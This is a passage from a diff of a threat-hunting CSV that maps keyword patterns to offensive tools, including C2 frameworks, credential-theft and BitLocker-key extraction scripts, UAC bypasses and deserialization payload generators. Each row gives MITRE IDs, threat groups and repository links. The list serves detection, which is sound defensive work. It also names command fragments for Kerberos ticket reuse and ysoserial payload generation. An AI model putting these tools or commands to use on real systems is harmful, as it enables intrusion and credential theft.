T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exploits/CVE-*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*exploit-suggester*","offensive_tool_keyword","Windows-Exploit-Suggester","This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins","T1199 - T1082 - T1210","TA0006 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/AonCyberLabs/Windows-Exploit-Suggester","1","1","N/A","N/A","10","3712","1016","2023-05-11T12:44:55Z","2014-07-08T13:16:28Z" "*ExploitTest.cpp*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" "*ExploitTest.vcxproj*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" "*export KRB5CCNAME=*.ccache*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" -"*export KRB5CCNAME=/*/impacket/administrator.ccache* ","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*export KRB5CCNAME=/*/impacket/administrator.ccache* ","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*Export-PowerViewCSV*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Export-PowerViewCSV*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Export-PowerViewCSV*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*exports --dll *.dll --prototypes ./Assets/prototypes.csv*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" -"*exposed_get_password*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*exposed_get_password*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*exrienz/DirtyCow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","1","N/A","N/A","1","27","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" -"*extensions/sniffer*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*extensions/sniffer*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*external_c2.cna*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2.*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2.dll*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2.Net*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*ExternalC2.Net.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*externalc2.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*externalc2.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*ExternalC2\*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*externalc2_start*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2Core*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" @@ -10149,56 +10300,56 @@ "*ExternalC2Tests*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2Web*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalRecon.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*extract_cmd_exec*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*extract_cmd_exec*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*extract_cmd_exec*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*extract_cmd_exec*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*extract_reflective_loader*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*ExtractBitLockerKeys*@podalirius_*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" -"*ExtractBitlockerKeys.ps1*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" -"*ExtractBitlockerKeys.py*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" -"*ExtractBitlockerKeys-main*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitLockerKeys*@podalirius_*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitlockerKeys.ps1*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitlockerKeys.py*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitlockerKeys-main*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" "*ExtractDataXML_BruteForce*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*extracttgsrepfrompcap.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*extra-scripts*timecrack.py*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" "*eyewitness -f urls.txt --web*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*-f BinaryFormatter -g PSObject -o base64 -c *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*-f Json.Net -g ObjectDataProvider -o raw -c *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*-f BinaryFormatter -g PSObject -o base64 -c *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*-f Json.Net -g ObjectDataProvider -o raw -c *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*-f payloads_examples/calc.*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" -"*f0432754020470baca5728aa59790267492406f847c1210fc6f1ba1b1466047b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f0432754020470baca5728aa59790267492406f847c1210fc6f1ba1b1466047b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*F1527C49-CA1F-4994-BB9D-E20DD2C607FD*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*f1zm0/acheron*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense 